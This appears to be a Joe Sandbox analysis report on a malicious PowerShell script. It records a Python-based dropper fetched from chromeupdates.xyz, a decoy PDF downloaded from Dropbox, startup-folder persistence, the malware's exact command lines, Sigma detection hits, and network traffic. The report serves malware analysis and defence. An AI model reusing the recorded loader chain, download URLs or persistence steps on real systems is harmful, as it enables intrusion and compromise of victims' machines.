Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
protected.ps1

Overview

General Information

Sample name:protected.ps1
Analysis ID:1556280
MD5:1acc58a5906a2bbb99c52afa5d29a46c
SHA1:eaff5f5949f015597f2a558dcc0bd86788464591
SHA256:0da85c4b554215f0a8ca81af0aea01fb7d197bd6da81b64a07e1ccc0d2e384ff
Tags:88216995ps1user-JAMESWT_MHT
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Performs DNS queries to domains with low reputation
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Powerup Write Hijack DLL
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 6540 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 2924 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES949A.tmp" "c:\Users\user\AppData\Local\Temp\o3u40tef\CSCF365B556FF7845F2AC7AB259D83AC6F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • Acrobat.exe (PID: 5860 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Document.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 1248 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7208 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1608,i,15562068496254741247,5473904975598172256,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • synaptics.exe (PID: 5488 cmdline: "C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe" C:\Users\user\AppData\Local\ChromeApplication\runtime.py MD5: 8AD6C16026FF6C01453D5FA392C14CB4)
  • svchost.exe (PID: 6592 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • synaptics.exe (PID: 7460 cmdline: "C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe" C:\Users\user\AppData\Local\ChromeApplication\runtime.py MD5: 8AD6C16026FF6C01453D5FA392C14CB4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2804, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecurity.lnk
Sigma detected: Powerup Write Hijack DLL
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2804, TargetFilename: C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\fetch_macholib.bat
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1", ProcessId: 2804, ProcessName: powershell.exe
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2804, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline", ProcessId: 6540, ProcessName: csc.exe
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2804, TargetFilename: C:\Users\user\AppData\Local\ChromeApplication\DLLs\libcrypto-1_1.dll
Sigma detected: Startup Folder File Write
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2804, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecurity.lnk
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2804, TargetFilename: C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1", ProcessId: 2804, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6592, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\protected.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2804, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o3u40tef\o3u40tef.cmdline", ProcessId: 6540, ProcessName: csc.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.5% probability
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C5486C0 _PyOS_URandom,PyErr_Format,CryptAcquireContextW,PyErr_SetExcFromWindowsErrWithFilenameObjects,CryptGenRandom,7_2_6C5486C0
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C548750 _PyOS_URandomNonblock,PyErr_Format,CryptAcquireContextW,PyErr_SetExcFromWindowsErrWithFilenameObjects,CryptGenRandom,7_2_6C548750
Source: unknownHTTPS traffic detected: 202.92.4.57:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\shell.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00FEA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\bits.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C009D5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: debugger_parent = pdb.Pdb source: debugger.py.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32profile.pdb source: win32profile.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\taskscheduler.pdb!! source: powershell.exe, 00000000.00000002.2376887692.0000015C010DB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: _uuid.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\propsys.pdb88 GCTL source: powershell.exe, 00000000.00000002.2376887692.0000015C00CDA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: _decimal.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: synaptics.exe, 00000007.00000000.2373793259.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 0000000E.00000000.2491836715.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 0000000E.00000002.2494935761.0000000000542000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, synaptics.exe, synaptics.exe, 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, synaptics.exe, 0000000E.00000002.2496652753.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, vcruntime140.dll.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\ifilter.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00B39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00B2F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\internet.pdb// GCTL source: powershell.exe, 00000000.00000002.2376887692.0000015C00BB2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32api.pdb!! source: win32api.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\directsound.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00A63000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\shell.pdbll"GCTL source: powershell.exe, 00000000.00000002.2376887692.0000015C00FEA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\python310.pdb source: synaptics.exe, 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmp, synaptics.exe, 0000000E.00000002.2496158188.000000006C6A4000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: scorlib.pdb ~\ source: powershell.exe, 00000000.00000002.2448977890.0000015C7E1DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\directsound.pdb++ source: powershell.exe, 00000000.00000002.2376887692.0000015C00A63000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\internet.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00BB2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: .pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2448977890.0000015C7E1DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2448977890.0000015C7E150000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\axscript.pdb11 source: powershell.exe, 00000000.00000002.2376887692.0000015C0226F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\propsys.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00CDA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: select.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\taskscheduler.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C010DB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\bits.pdb++ source: powershell.exe, 00000000.00000002.2376887692.0000015C009D5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: synaptics.exe, 00000007.00000000.2373793259.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 00000007.00000002.2397103659.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 0000000E.00000000.2491836715.0000000000542000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 0000000E.00000002.2494935761.0000000000542000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32api.pdb source: win32api.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: _decimal.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\win32\_msi.pdb source: _msi.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32clipboard.pdb source: win32clipboard.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32pdh.pdb source: win32pdh.pyd.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\axscript.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C0226F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\mapi.pdb99 source: powershell.exe, 00000000.00000002.2376887692.0000015C00C41000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\mapi.pdb source: powershell.exe, 00000000.00000002.2376887692.0000015C00C41000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: The standard debugger class (pdb.Pdb) is an example. source: bdb.py.0.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

Networking

barindex
Performs DNS queries to domains with low reputation
Source: DNS query: chromeupdates.xyz
Source: global trafficHTTP traffic detected: GET /cum/synaptics.zip HTTP/1.1Host: chromeupdates.xyzConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 162.125.65.18 162.125.65.18
Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /scl/fi/evu7c2vgbewx58xom0qaa/Your-Benefits-and-Role.pdf?rlkey=qa56drncavprj5y2nd7i1bgzq&st=so1oyzsc&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cd/0/get/CeYLvLikFX2y1znhZcHxMXpDXU5aAQInOsXU4TA40PP2Sf-qOX27-quRdcM9Ax9TtVD7MpkWib9sRqMTEbIddVFGx8phIMYrloP34nB0EL2ZJiBMERO2oidCUxkUhSv6rO64KXLDE72pmtnSapDuuvb3/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /cum/synaptics.zip HTTP/1.1Host: chromeupdates.xyzConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /scl/fi/evu7c2vgbewx58xom0qaa/Your-Benefits-and-Role.pdf?rlkey=qa56drncavprj5y2nd7i1bgzq&st=so1oyzsc&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cd/0/get/CeYLvLikFX2y1znhZcHxMXpDXU5aAQInOsXU4TA40PP2Sf-qOX27-quRdcM9Ax9TtVD7MpkWib9sRqMTEbIddVFGx8phIMYrloP34nB0EL2ZJiBMERO2oidCUxkUhSv6rO64KXLDE72pmtnSapDuuvb3/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; font-src https://* data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fzPolicy: base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; font-src https://* data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ps://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; font-src https://* data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com 